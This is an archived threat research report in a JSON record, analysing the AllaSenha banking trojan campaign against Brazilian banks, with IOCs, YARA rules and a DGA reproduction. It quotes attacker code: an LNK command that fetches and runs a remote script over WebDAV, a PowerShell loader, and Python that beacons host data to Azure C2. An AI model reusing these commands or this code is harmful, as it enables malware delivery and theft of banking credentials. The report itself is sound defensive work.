{
	"id": "4a12b9a9-212d-4e18-bf8d-b9d87bff5a75",
	"created_at": "2026-04-10T03:20:00.275543Z",
	"updated_at": "2026-04-10T03:22:17.766647Z",
	"deleted_at": null,
	"sha1_hash": "6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67",
	"title": "AllaSenha: AllaKore variant leverages Azure cloud C2 to steal banking details in Latin America",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2293868,
	"plain_text": "AllaSenha: AllaKore variant leverages Azure cloud C2 to steal banking\r\ndetails in Latin America\r\nBy Cyber Threat Research Team\r\nPublished: 2024-05-28 · Archived: 2026-04-10 03:00:28 UTC\r\nIdentifier: TRR240501.\r\nSummary\r\nEarlier in May, our security product spotted a malicious payload, which an attacker attempted to deliver to a computer in Brazil,\r\nvia an intricate infection chain involving Python scripts and a Delphi-developed loader.\r\nThe final malicious payload, which we named “AllaSenha”, is specifically aimed at stealing credentials that are required to\r\naccess Brazilian bank accounts, leverages Azure cloud as command and control (C2) infrastructure, and is another custom\r\nvariant of “AllaKore”1, an infamous open-source RAT which is frequently leveraged to target users in Latin America.\r\nThis report describes the specific infection chain that we encountered, provides associated indicators of compromise (IOCs),\r\nand presents the AllaSenha malware.\r\nInfection chain\r\nThe infection chain that we encountered (see Fig. 1) in May ends with the deployment and execution of AllaSenha. It starts\r\nwith a phishing email, leading to a malicious Windows shortcut file (LNK), which is disguised as a PDF file and distributed\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 1 of 14\n\nthrough WebDAV.\r\nFigure 1 – Overview of AllaSenha’s deployment steps, from infection to delivery\r\nWe could also identify likely previous variants of some of the described malicious tools, which were delivered in 2023,\r\nabusing public cloud hosting services (such as Autodesk A360 Drive or GitHub) to host malicious payloads. 
The final\r\npayloads were decrypted using the same techniques as the ones that are implemented by BPyCode (see later).\r\nFrom the reliable chronological information we could obtain about the malicious LNK and the staging servers they\r\nwere served from, we believe with medium confidence that the attackers switched to the exact infection chain we describe in\r\nthis report starting March 2024.\r\nInfection vector\r\nThanks to cooperation, we could precisely identify a phishing email from which the infection chain that we describe started.\r\nWhile we cannot share the full content of this exact email, we retrieved several almost identical samples from late April\r\n2024, leading to the exact same infection chain and phishing website:\r\nFigure 2 – Example of a phishing email starting such an infection chain\r\nThe phishing email impersonates a notification for an electronic invoice (“Nota Fiscal de Serviços Eletrônica”11 or “NFS-e” in Portuguese), which appears to be a frequent lure against targets in Brazil12, as such an electronic invoicing process is common,\r\nand even mandatory in some circumstances since September 2023. The phishing email samples that we retrieved are all\r\nvisually very close, but the subject and exact content vary slightly, likely just enough to possibly defeat some elementary\r\ncontent-based spam filters. We identified the following subjects from retrieved email samples: NFS-e Emitida, Segue a NFe\r\ngerada, Nota Fiscal gerada, Nota Fiscal – \u003can identifier\u003e.\r\nMalicious emails contain a link to the is[.]gd link shortener (such as hxxps://is[.]gd/As1idV?0192524.3043 ), which\r\nredirects to a phishing website (see Fig. 
3), hosted on a dedicated domain ( nfe-digital[.]digital ), through a URL\r\nmatching this pattern: hxxps://notafiscal.nfe-digital[.]digital/nota-estadual/?notafiscal=\u003can identifier\u003e\r\nFigure 3 – Example of a phishing website as displayed to the targeted users\nPhishing webpages include a button which links to a Windows search: protocol13 URL. The latter enables displaying files\nfrom a remote WebDAV server in a standard Windows Explorer window (see Fig. 4 in the next section):\n[![Ícone de PDF](Nota%20Fiscal_files/pdf-icon.png)](search:query=NotaFiscal.pdf\u0026crumb=location:\\\\191.232.38[.]222@80\\Documentos\u0026displayname=Downloads)\nMalicious LNK\nIf a targeted user clicks the button on a phishing page, a standard Windows Explorer window is displayed to the user (see\nFig. 4), listing the files that are staged at the remote WebDAV path: a malicious LNK file which is poorly masqueraded as a\nPDF document ( NotaFiscal.pdf.lnk , SHA-256\n8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535 ), and a directory ( dc , which contains the BPyCode\nlauncher, a malicious BAT file):\n\\\\191.232.38[.]222@80\\Documentos\\\n├── dc/\n│ └── c.cmd\n└── NotaFiscal.pdf.lnk\nFigure 4 – Malicious files from the WebDAV server as presented to the targeted user\nThe targeted user, lured into thinking a PDF invoice must be opened, is expected to execute the malicious LNK\n( NotaFiscal.pdf.lnk ). 
The LNK file in turn runs a Windows command shell, which creates and opens2 a fake invalid PDF\nfile ( NotaFiscal.pdf ) in the user’s Downloads folder, then triggers the download and execution of the BPyCode launcher\n( c.cmd ):\n%windir%\\system32\\cmd.exe /min /c \"echo Indisponivel \u003e %userprofile%\\downloads\\NotaFiscal.pdf\n\u0026 start %userprofile%\\downloads\\NotaFiscal.pdf\n\u0026 start /min cmd.exe /c \"\\\\191.232.38[.]222@80\\Documentos\\dc\\c.cmd\"\"\r\nWe could identify several similar additional WebDAV paths and malicious LNK files, which are all listed in the Appendix.\r\nBPyCode launcher\r\nThe malicious LNK we described downloads and runs a malicious BAT payload ( c.cmd , SHA-256\r\n8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535 ), which we named “BPyCode launcher”, as part of\r\nits execution logic.\r\nThe BPyCode launcher merely launches a base64-encoded PowerShell command. 
The resulting PowerShell script downloads the\r\nPython binary from the official python.org website, and drops it into a newly created folder3 in the C:\\Users\\Public directory:\r\ncd $ENV:public\r\n# The folder and renamed interpreter take their name from the reversed, lowercased computer name\r\n$CP = ($env:COMPUTERNAME -replace \"-\",\"\") -replace \"DESKTOP\", \"\"\r\n$CP2 = -join ($CP[-1..-($CP.length)])\r\n$CP3 = $CP2.ToLower()\r\n$Folder2 = \"${ENV:public}\\$CP3\"\r\nif (!(Test-Path -Path $Folder2 -PathType Container)) {\r\n    Invoke-WebRequest -URI https://www.python.org/ftp/python/3.10.0/python-3.10.0-embed-win32.zip -OutFile \"$CP3.zip\";\r\n    Expand-Archive \"$CP3.zip\" -DestinationPath $Folder2;\r\n    Copy-Item -Path \"$Folder2\\pythonw.exe\" -Destination \"$Folder2\\$CP3.exe\"\r\n}\r\n# The renamed pythonw.exe decodes and runs the embedded BPyCode script\r\n\u0026 \"$Folder2\\$CP3.exe\" -c \"\"\"import base64; exec(base64.b64decode('''''''''\u003cBASE64-ENCODED PYTHON SCRIPT\u003e''')); exit()\"\"\";\r\nThis PowerShell launcher uses the downloaded and renamed Python interpreter to further execute a base64-encoded Python\r\nscript, which we named “BPyCode”.\r\nStage 1 – BPyCode: a Python DLL downloader and loader\r\nBPyCode is a Python script that is in charge of downloading a DLL (“ExecutorLoader”), and executing it in-memory. The\r\nscript was decoded from base64 (by the BPyCode launcher script), and never written as a file, so providing a hash to\r\nidentify the exact BPyCode sample we analysed would not be relevant. However, BPyCode later writes a variant of itself as\r\na file (SHA-256 6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e ) during persistence setup – we\r\nlisted all identified BPyCode file hashes in the Appendix anyway.\r\nBPyCode uses a domain generation algorithm (DGA) to generate a list of 3 hostnames (of the following pattern:\r\n\u003cDGA\u003e.brazilsouth.cloudapp.azure[.]com ), as well as a list of 10 TCP ports. 
BPyCode tries to download a payload from\r\none of the possible combinations of the generated hostnames and ports, and retries with additional combinations until it\r\nreceives data.\r\n# Hostnames generation algorithm from BPyCode\r\ndef lk():\r\n    import hashlib\r\n    from datetime import date\r\n    try:\r\n        d = date.today()\r\n        wi = d.weekday()  # 0 (Monday) to 6 (Sunday)\r\n        di = d.day + wi   # day of month plus weekday, used as an index below\r\n        l = 'fghijlmnopqrstuvxzwkyjlmnopqabcghjlabcde'[di]\r\n        r = []\r\n        for _ in range(50, 61, 5):  # one candidate hostname for each of 50, 55 and 60\r\n            t = hashlib.sha1(f\"{di*wi*_}{l}{wi}{l}{d.month * di*_}{l}{d.year*di*_}\".encode()).hexdigest()*10\r\n            r.append(t[:_].replace(t[:di], l).lower())\r\n        return r\r\n    except:\r\n        return [f'google{di}']\r\nGenerated hostnames seem to match those that are associated with the Microsoft Azure Functions4 service, a serverless\r\ninfrastructure that in this case would allow operators to easily deploy and rotate their staging infrastructure.\r\nThe protocol that is used to download from staging servers is raw TCP. 
Before waiting for server-emitted data, BPyCode\r\nsends an identifier ( pyCodeV10 - *NEWW* ) and some basic information about the targeted computer (host’s processor name,\r\nWindows version and current username):\r\nwith ss.socket(ss.AF_INET, ss.SOCK_STREAM) as s:\r\n s.settimeout(30)\r\n s.connect((f'{choice(lk())}.brazilsouth.cloudapp.azure.com', choice(ptV5())))\r\n s.send(f'pyCodeV10 - *NEWW* {ss.gethostname()} | {vs} | {pr}'.encode())\r\nThe data that BPyCode expects in return is a Pickle5-serialized dictionary which contains:\r\nan additional Python loader script to execute;\r\na ZIP archive which contains the “PythonMemoryModule”6 Python package, which is aimed at loading a DLL in-memory;\r\nanother ZIP archive which contains ExecutorLoader, a PE library.\r\nBoth ZIP archives are encrypted (ZipCrypto) with the same password: Snh2301**Snh2301** .\r\nThe additional Python loader script that is provided by the server is executed in-memory from BPyCode (via the eval\r\nPython function):\r\nit sets BPyCode persistence up, by writing a variant of a BPyCode script under C:\\Users\\Public\\\u003cfilename\u003e.txt\r\n(where \u003cfilename\u003e matches the folder name which is created by the BPyCode launcher3), and creating a registry\r\nrun key at HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\u003cfilename\u003e ;\r\nit decrypts and extracts downloaded ZIP archives in memory;\r\nit leverages the PythonMemoryModule to dynamically load ExecutorLoader in-memory, then runs its entrypoint (the\r\nexport named Force ).\r\nDuring our analysis, we tried to alter the identifier that is sent from BPyCode to the staging servers ( pyCodeXXX... 
) before\r\ndownloading further data, and as a result we were able to obtain different payloads, but all match the delivery process that\r\nwe describe, and ultimately lead to AllaSenha.\r\nWe also noted that the password which is used to protect downloaded ZIP archives may be extensively reused by the threat\r\nactor, as we were able to decrypt older and publicly available payloads using the same one. Decrypting older payloads also\r\nyielded different AllaSenha samples.\r\nA last interesting detail is that BPyCode contains a sort of “killswitch” mechanism, as it will stop its execution in case the\r\ntargeted computer’s processor name contains Broadwell . Broadwell is an Intel microarchitecture that was discontinued in\r\n2018. The goal of this killswitch is not clear, but we speculate that this condition allows attackers to filter out appliances that\r\nare of no interest for the operators (the final payload being dedicated to workstations), or to avoid execution from some\r\nsandboxes we could not identify.\r\nStage 2 – ExecutorLoader: a simple Delphi-developed DLL loader\r\nFile name executor.dll\r\nCompilation time 2024-05-02 10:44:22\r\nHash (SHA-256) 99d0de52a63e5ff790e468dbb8cd0d5273b51ca3b67b5963c0bdedc3a4f44f12\r\nExecutorLoader is a Borland Delphi (10.4) developed DLL which exports a single function called Force . This DLL is\r\ndownloaded and executed in-memory by BPyCode, and is aimed at further decoding and executing the final payload (in our\r\ncase, AllaSenha) which is embedded as a resource. 
To do so, ExecutorLoader injects the payload into a (renamed)\r\nmshta.exe instance.\r\nThe Force function first copies the system’s mshta.exe binary to another file using a random name, under a directory\r\nchosen from a predefined list:\r\nFigure 5 – Random directory selection function\r\nExecutorLoader launches the copied binary using CreateProcessW , then loads one of its own resources (named RcDll )\r\nwhich holds a UPX-packed DLL (SHA-256 65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841 –\r\nwhich in our case is AllaSenha). The mshta.exe process is opened, memory is allocated using VirtualAlloc and the\r\nloaded resource is copied inside this allocated region:\r\nFigure 6 – Function injecting the UPX-packed payload in mshta.exe\r\nA thread is then created inside the remote mshta.exe process, to run the final payload (AllaSenha).\r\nWe could identify some older versions of ExecutorLoader, distributed as an executable binary, called Execute_dll.exe\r\n(and usually stored in a ZIP file called Execute_dll.zip , which would be encrypted using the same password as the one\r\nused by BPyCode). The code of this executable is exactly the same as the described DLL version, except of course for the\r\nentrypoint. 
This executable version has notably been hosted on GitHub at\r\nhttps://raw.githubusercontent[.]com/marinabarros320168/new/main/Execute_dll.exe .\r\nAllaSenha, an AllaKore RAT variant\r\nFile name N/A\r\nCompilation time 2024-05-02 10:44:07\r\nHash (SHA-256) 65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841\r\nThe final payload which is deployed from ExecutorLoader is a banking trojan which we named “AllaSenha”, and which is\r\ncomprised of a single 32-bit Windows UPX-packed DLL (once unpacked using UPX 4.2.2, its SHA-256 is\r\nac4b4b6cfe4d4e8710384246c008764cdb7547a6c3081e72687fefdf0614c7a5 ).\r\nAllaSenha targets Brazil’s main banks, such as Sicredi, Itaú Unibanco, Caixa, Banco do Brasil, or Sicoob and aims at stealing\r\npasswords, 2-factor authentication (2FA) tokens and QR codes.\r\nAllaSenha leverages Azure cloud as C2 infrastructure. It implements a DGA (in functions called GeraHost and GeraPorta\r\n– “Generate Host” and “Generate Port” in Portuguese), which generates a C2 hostname in the\r\n.brazilsouth.cloudapp.azure[.]com domain, as well as a port to connect to. AllaSenha’s DGA differs from the one in\r\nBPyCode: it is based on the execution date, and may vary depending on the bank for which credentials are exfiltrated (one\r\nDGA modifier applies to Banco do Brasil only, another to Itaú Unibanco only). A reproduction of AllaSenha’s DGA is\r\nprovided in the Appendix – as an example, nhefxgbdedndzhebcfedufbgkfecgbccfecgbcc.brazilsouth.cloudapp.azure[.]com\r\nis a C2 hostname which has been generated on 2024-05-27.\r\nJust like BPyCode, C2 communications between the malware and the server use raw ASCII text over a TCP socket. 
To\r\nhandle part of these communications, AllaSenha appears to include a Delphi open-source library called ServerSocket7,\r\nallowing basic RAT functionalities such as keyboard and mouse control, as well as remote desktop capabilities. Interestingly,\r\nwhile AllaKore1 and ServerSocket do not seem to be directly related, both projects use the same name pattern for C2\r\ncommands ( \u003c|COMMAND|\u003e ), which may indicate that they are either often used in conjunction or inspired by one another.\r\nAll AllaSenha samples that we retrieved use Access_PC_Client_dll.dll as their original file name. This name can notably\r\nbe found in the KL Gorki8 project, a banking malware which seems to combine components of both AllaKore and\r\nServerSocket. As a result, we believe with medium to high confidence that AllaSenha is initially based on the KL Gorki\r\nsource code in particular.\r\nThe list of commands found in AllaSenha offers a glimpse of the malware’s capabilities:\r\n\u003c|ASS-BLUE-PJ|\u003e\r\n\u003c|ASS-BLUE|\u003e\r\n\u003c|ASS-SANTA|\u003e\r\n\u003c|BB-AMARELO|\u003e\r\n\u003c|BB-AZUL|\u003e\r\n\u003c|BB-PASS6|\u003e\r\n\u003c|BB-PASS8|\u003e\r\n\u003c|BB-PROCURADOR|\u003e\r\n\u003c|BLOQUEAR|\u003e\r\n\u003c|CLOSEKEYBOARD|\u003e\r\n\u003c|DESCO-TKAPP|\u003e\r\n\u003c|DESCO-TKCHAVEIRO|\u003e\r\n\u003c|FECHAR-ANYDESK|\u003e\r\n\u003c|ITAU-SNH-CARTAO|\u003e\r\n\u003c|ITAU-SNH-ENTRADA|\u003e\r\n\u003c|ITAU-TK-APP|\u003e\r\n\u003c|ITAU-TK-CHAVEIRO|\u003e\r\n\u003c|ITAU-TK-SMS|\u003e\r\n\u003c|LIMPAR-TECLAS|\u003e\r\n\u003c|PRINCIPAL|\u003e\r\n\u003c|PUXAR-TECLAS|\u003e\r\n\u003c|QR-CONFIRMADO|\u003e\r\n\u003c|REQUESTKEYBOARD|\u003e\r\n\u003c|SAFRA-DADOS|\u003e\r\n\u003c|SENHA|\u003eAss:\r\n\u003c|SICOOB-HEIGTH|\u003e\r\n\u003c|SICREDI-TOKEN-CELULAR|\u003e\r\n\u003c|SICREDI-TOKEN-CHAVEIRO|\u003e\r\n\u003c|START-CAPTURA|\u003e\r\n\u003c|STN-6DG|\u003e\r\n\u003c|STOP-CAPTURA|\u003e\r\n\u003c|TAMANHO|\u003e\r\n\u003c|UNICRED-ASS|\u003e\r\n\u003c|UNICRED-TKN|\u003e\r\nUpon launch, AllaSenha reads the user’s browser data to search for credentials associated with targeted banks. If AllaSenha\r\nis unable to find any, it enters a “waiting” state in which it starts multiple threads to check if the user is performing actions\r\nassociated with banking. Actions that can get AllaSenha to leave its waiting state include browsing to a targeted\r\nbanking website, the usage of the itauaplicativo.exe (from Itaú Unibanco) desktop application, or the saving of\r\npasswords associated with targeted banks in the browser password database. AllaSenha does not communicate with C2\r\nservers if it has not found data of interest.\r\nTo deal with 2FA, which is enabled on most banking websites, AllaSenha has the ability to display dedicated hijacking\r\nwindows requiring targeted users to provide a second factor. Using the \u003c|TRAVAR|\u003e command, operators can\r\nfreeze the user’s desktop with a fake bank security plugin load screen:\r\nFigure 7 – AllaSenha fake security plugin load screen\r\nWe believe this screen exists to give operators some time to interact with AllaSenha while trying to use stolen credentials for\r\ntransactions. Operators can then issue AllaSenha commands to display 2FA validation windows on the targeted user’s desktop,\r\ndepending on the bank they are trying to connect to. 
For instance, operators can require a targeted user to validate an\r\noperator-initiated transaction by scanning a QR code, and entering a confirmation secret which would be provided by the\r\nBradesco mobile application (the QR code has been redacted in the following capture):\r\nFigure 8 – AllaSenha QR code-based hijacking window\r\nMultiple 2FA windows are available for operators to hijack tokens of different types, such as in-app tokens, SMS tokens and\r\nQR codes.\r\nInfrastructure\r\nThe threat actor most notably leverages the is[.]gd link shortener and dedicated domains as part of its phishing\r\ninfrastructure, as well as Azure cloud infrastructure as payload stagers and C2 servers.\r\nPhishing websites\r\nLinks in phishing emails leverage the is[.]gd link shortener to redirect to dedicated phishing domains. The malicious\r\nemail samples that we retrieved all ultimately lead to phishing URLs on these 2 hostnames: notafiscal.nfe-digital[.]digital , nota-fiscal.nfe-digital[.]top .\r\nHostnames resolve to Cloudflare IPs, but the original content is likely hosted at HostGator Brazil14, as can be guessed from\r\nthe HTTP error pages that are displayed by the phishing websites in case of an invalid URL. Both associated domains were\r\nregistered on 2024-04-26 at GoDaddy, and set to use Cloudflare name servers.\r\nPivoting from the described characteristics, we identified 2 additional and similar domains that were registered on\r\n2024-04-25, and that we believe with medium confidence have been (or could be) used as part of a phishing infrastructure: nfe-digital[.]online , nfe-digital[.]site .\r\nStagers\r\nThe WebDAV server which delivered the malicious LNK in the case that we described ( 191.232.38[.]222@80 ) had been\r\nset up the day before, and taken down the day after. 
This server only had a single HTTP server running on port 80, with a\r\ndefault Apache 2 index page. On this server, whose IP belongs to Microsoft (ASN 8075) and which is located in Brazil, a\r\n/Documentos directory containing a malicious LNK and a BPyCode launcher was staged.\r\nWe identified several other WebDAV paths matching Microsoft IPs in Brazil, which hosted both a NotaFiscal.pdf.lnk\r\nmalicious LNK file (all samples that we retrieved triggered the same actions as we described) and a malicious BAT\r\ndownloader:\r\nWebDAV path|Hosted Malicious LNK (SHA-256)|Hosted BPyCode launcher|D W c m\r\n\\\\191.239.123[.]241@80\\Documentos\\|46e754727efdc2c891319d25a67ee999a4d8a0b21b0113db08eead42cf51b780|files\\a3.cmd|2\r\n\\\\191.234.212[.]140@80\\Documentos\\|2c53b4dc15882cf22772994d8ed0947e4a8b70aef3a12ab190017b3317c167ea|files\\a3.cmd|2\r\n\\\\191.239.116[.]217@80\\Documentos\\|a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef|files\\a3.cmd|2\r\n\\\\191.235.87[.]229@80\\Documentos\\|1b4f44a00f61b3e0c8cd6c3125f03b6d4897d6ab90c8a6dc899ed96acee80dd6|dc\\c.cmd|2\r\n\\\\191.232.38[.]222@80\\Documentos\\|8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535|dc\\c.cmd|2\r\n\\\\20.197.250[.]132@80\\Documentos\\|Unknown|dc\\c.cmd|2\r\nWe could identify several additional WebDAV paths from malicious LNK samples, but we could not retrieve reliable\r\nchronological and exposed services information for the associated servers – they are all listed in the Appendix.\r\nThe DGA function in BPyCode takes the current date as an argument to generate 3 distinct hostnames. We could determine\r\nthat associated generated hostnames were set up to deliver payloads daily. At the time of writing, the threat actor seems to\r\nhave stopped using *.brazilsouth.cloudapp.azure.com hostnames for payload delivery. 
The DGA methodology leveraged\r\nto connect to Azure-hosted (possibly “serverless”) infrastructure shows that the threat actor tried to automate the creation\r\nand rotation of its delivery infrastructure.\r\nC2 servers\r\nCommand and control servers were also hosted on Azure cloud infrastructure. As described in the sample analysis,\r\nAllaSenha also implements a DGA which ensures a daily C2 hostname rotation. At the time of writing, newly generated\r\ndomains appear to be inactive, indicating that attackers may have either paused their activity, changed their C2 infrastructure\r\nor modified their DGA.\r\nAttribution\r\nWe could not reliably link the described activities to a known and consistently defined threat actor.\r\nYet the malicious files we analysed contained some clues that might be useful for attribution. The initial malicious LNK for\r\ninstance contained information about the computer from which the file was created:\r\nParsingPath: C:\\Users\\bert1m\\Desktop\\test.html\r\nFolderPath: C:\\Usuários\\bert1m\\Área de Trabalho\r\nMAC address: 94:53:30:e7:6f:42\r\nHostname: desktop-20a11ho\r\nWe can note that the local language of the computer on which the LNK file was generated is Portuguese ( C:\\Usuários\\ ) –\r\nthis is consistent with the targeting of AllaSenha (see below) and further language clues in BPyCode. 
AllaSenha samples that\r\nwe retrieved (for instance, SHA-256 278897ee9158f9843125bc2e26c14f96c4e79d5fc578b7e5973dc8dc919a3400 ) also\r\ncontained unstripped source code paths using the same bert1m username:\r\nC:\\Users\\bert1m\\Desktop\\Meu Driver\\DELPHI XE5\\Cliente\\ZLibExApi.pas\r\nC:\\Users\\bert1m\\Desktop\\Meu Driver\\DELPHI XE5\\Cliente\\Conectar.pas\r\nThis suggests that a single individual going by the bert1m nickname could be responsible for the development of multiple\r\nparts of the infection chain, from infection to the final malware. This however does not necessarily demonstrate that the\r\ndeveloper is directly involved with the operation of such tools.\r\nWhen searching for the bert1m nickname, we were able to find several public social media profiles, 2 of them at least\r\nmatching Portuguese-speaking individuals, but could not reliably link any of those profiles further with any malicious\r\nactivity or files.\r\nTargets\r\nStrictly sticking to the infection chain that we described and the resulting AllaSenha samples, we could only (and reliably)\r\nidentify targets in Brazil. We do not have enough contextual data to determine if individuals or organizations were\r\nspecifically targeted.\r\nBased on AllaSenha analysis, we can determine that the threat actor is specifically gathering credentials to access the\r\nfollowing banks:\r\nBanco do Brasil;\r\nBradesco;\r\nBanco Safra;\r\nItaú Unibanco;\r\nSicoob;\r\nCaixa Econômica Federal.\r\nConclusion\r\nThe ecosystem of cyber threats that specifically target Latin America9,10 is the home of peculiar malware samples and\r\nuncommon practices – but those are sometimes combined with well-known infection or delivery techniques that are common\r\nin the cybercrime landscape. 
Attackers keep regularly changing malicious infrastructure, infection methods and loaders to\r\nevade defenses, and while used techniques remain relatively simple, the lack of documentation and the determination of\r\nthese groups make them a real threat.\r\nThe threat actors that operate in Latin America appear to be a particularly productive source of cybercrime campaigns.\r\nWhile almost exclusively targeting Latin American individuals to steal banking details, these actors often end up\r\ncompromising computers that are indeed operated by subsidiaries or employees in Brazil, but that belong to companies all\r\naround the world. As a result, such threats should not be underestimated and require proper response, way beyond the\r\nBrazilian borders.\r\nAppendix\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nDomains\r\nnfe-digital[.]digital|Phishing URLs root domain\r\nnfe-digital[.]top|Phishing URLs root domain\r\nPossibly malicious and/or associated domains\r\nnfe-digital[.]online|Possibly malicious and/or associated domain\r\nnfe-digital[.]site|Possibly malicious and/or associated domain\r\nYARA rules\r\nrule allasenhamaycampaign_executorloader\r\n{\r\n meta:\r\n description = \"Detects Delphi ExecutorLoader DLLs and executables.\"\r\n references = \"TRR240501\"\r\n date = \"2024-05-28\"\r\n author = \"HarfangLab\"\r\n context = \"file,memory\"\r\n strings:\r\n $delphi = \"Embarcadero Delphi\" ascii fullword\r\n $s1 = \"\\\\SysWOW64\\\\mshta.exe\" wide fullword\r\n $s2 = \"\\\\System32\\\\mshta.exe\" wide fullword\r\n $s3 = \"RcDll\" wide fullword\r\n $default1 = \"Default_\" wide fullword\r\n $default2 = \"Default~\" wide fullword\r\n condition:\r\n $delphi\r\n and all of ($s*)\r\n and any of ($default*)\r\n}\r\nrule allasenhamaycampaign_allasenha\r\n{\r\n meta:\r\n description = \"Detects AllaSenha banking trojan DLLs.\"\r\n references = \"TRR240501\"\r\n date = \"2024-05-28\"\r\n author = \"HarfangLab\"\r\n context = \"file,memory\"\r\n strings:\r\n $a1 = \"\u003c|NOSenha|\u003e\" wide fullword\r\n $a2 = \"\u003c|SENHA|\u003eQrCode: \" 
wide fullword\r\n        $a3 = \"\u003c|SENHA|\u003eSenha 6 : \" wide fullword\r\n        $a4 = \"\u003c|SENHA|\u003eSnh: \" wide fullword\r\n        $a5 = \"\u003c|SENHA|\u003eToken: \" wide fullword\r\n        $a6 = \"\u003c|BB-AMARELO|\u003e\" wide fullword\r\n        $a7 = \"\u003c|BB-AZUL|\u003e\" wide fullword\r\n        $a8 = \"\u003c|BB-PROCURADOR|\u003e\" wide fullword\r\n        $a9 = \"\u003c|ITAU-SNH-CARTAO|\u003e\" wide fullword\r\n        $a10 = \"\u003c|ITAU-TK-APP|\u003e\" wide fullword\r\n        $dga = { 76 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 78 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 7A 00 00\r\n    condition:\r\n        $dga\r\n        and (4 of ($a*))\r\n}\r\nAllaSenha DGA\r\nThis Python code snippet reproduces the logic of AllaSenha’s domain generation algorithm, which generates the C2 hostnames.\r\nimport datetime\r\n\r\n\r\ndef day_to_letter(i):\r\n    # Days above 26 are halved so that they fit the 27-character alphabet below.\r\n    if i \u003e 26:\r\n        i //= 2\r\n    return \"_abcdefghijlmnopqrstuvxzwky\"[i]\r\n\r\n\r\ndef to_signed_str(unsigned_value):\r\n    \"\"\"\r\n    Converts an integer into the corresponding signed 32-bit value, returned as a string.\r\n    :param unsigned_value: The input integer to convert\r\n    :return: The corresponding string\r\n    \"\"\"\r\n    bit_length = 32\r\n    if unsigned_value \u003e= 2**(bit_length - 1):\r\n        signed_value = unsigned_value - 2**bit_length\r\n    else:\r\n        signed_value = unsigned_value\r\n    return str(signed_value)\r\n\r\n\r\ndef intstr_to_domain(s):\r\n    \"\"\"\r\n    The input is a string which contains only digits (plus the minus sign of negative values). This function takes\r\n    them either one or two at a time to be used as indexes in a hardcoded array. If taking two digits makes for too\r\n    big an index, only one is used - this explains the huge disparity in the distribution of letters.\r\n    :param s: The concatenated decimal strings produced by to_signed_str\r\n    :return: The generated hostname prefix\r\n    \"\"\"\r\n    key = \"__abcdefghijlmnopqrstuvxzwky\"\r\n    out = \"\"\r\n    i = 0\r\n    while i \u003c len(s):\r\n        if i == len(s) - 1 or int(s[i:i+2]) \u003e= 28:\r\n            # Single digit: only values of 2 and above map to a letter.\r\n            if int(s[i:i+1]) \u003e= 2:\r\n                out += key[int(s[i])]\r\n            i += 1\r\n        else:\r\n            # Two digits (a minus sign followed by a digit is consumed here and yields no letter).\r\n            if int(s[i:i+2]) \u003e= 2:\r\n                out += key[int(s[i:i+2])]\r\n            i += 2\r\n    return out.rstrip('_')\r\n\r\n\r\nd = datetime.datetime(year=2024, month=5, day=28)  # Change to the desired date\r\nday_of_year = d.timetuple().tm_yday\r\nday_of_week = (d.weekday() + 1) % 7 + 1  # Computed by the sample but not used by the default variant below\r\nweek_of_year = d.isocalendar()[1]\r\ndomain = day_to_letter(d.day)\r\n# Per-target multiplier: the variant selects one of these depending on the targeted bank\r\nkey = {\r\n    \"ITAU-APP\": 0x55,\r\n    \"BB\": 0x56,\r\n    \"default\": 0x57\r\n}\r\nmultiplicator = key[\"default\"]\r\n# All intermediate products are truncated to 32 bits, as in the original binary\r\ncalculus1 = d.day**2 * day_of_year * multiplicator**3 \u0026 0xFFFFFFFF\r\ncalculus2 = day_of_year**2 * d.day * multiplicator \u0026 0xFFFFFFFF\r\ncalculus3 = day_of_year * d.day * multiplicator \u0026 0xFFFFFFFF\r\ncalculus4 = d.month * day_of_year * d.day * multiplicator \u0026 0xFFFFFFFF\r\ncalculus5 = week_of_year * day_of_year * d.day * multiplicator \u0026 0xFFFFFFFF\r\ninput_str = (f\"{to_signed_str(calculus1)}{to_signed_str(calculus2)}{to_signed_str(calculus3)}{to_signed_str(calculus4)}\"\r\n             f\"{to_signed_str(calculus5)}{to_signed_str(calculus5)}\")\r\nprint(domain + intstr_to_domain(input_str) + \".brazilsouth.cloudapp.azure[.]com\")\r\n1. https://github.com/OneideLuizSchneider/AllaKore_Remote\r\n2. The default PDF reader should not be able to display the created PDF file, as it is not a valid PDF.\r\n3. The generated name is the lowercased and reversed local name of the targeted machine, without dash characters,\r\nand without the “DESKTOP” word if any.\r\n4. 
https://learn.microsoft.com/en-us/azure/azure-functions/functions-overview?pivots=programming-language-csharp\r\n5. https://docs.python.org/3/library/pickle.html\r\n6. https://github.com/naksyn/PythonMemoryModule\r\n7. https://github.com/haithemnini/ServerSocket\r\n8. https://github.com/oxahax/Brazilian-Malwares/tree/master/Pascal-Delphi/KL-REMOTA-KL/KL%20Gorki\r\n9. https://blogs.blackberry.com/en/2024/01/mexican-banks-and-cryptocurrency-platforms-targeted-with-allakore-rat\r\n10. https://www.cybereason.com/blog/research/brazilian-financial-malware-banking-europe-south-america\r\n11. https://www.gov.br/nfse/pt-br/copy_of_perguntas-frequentes/copy_of_faq-nfs-e\r\n12. https://github.com/executemalware/Malware-IOCs/blob/main/2023-11-28%20Possible%20DBatLoader%20IOCs,\r\nNB: in spite of the claims from this reference, we could not associate the infection chain and payloads that we\r\ndescribe with DBatLoader.\r\n13. https://learn.microsoft.com/en-us/windows/win32/shell/search-protocol#examples\r\n14. https://www.hostgator.com.br/\r\nSource: https://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
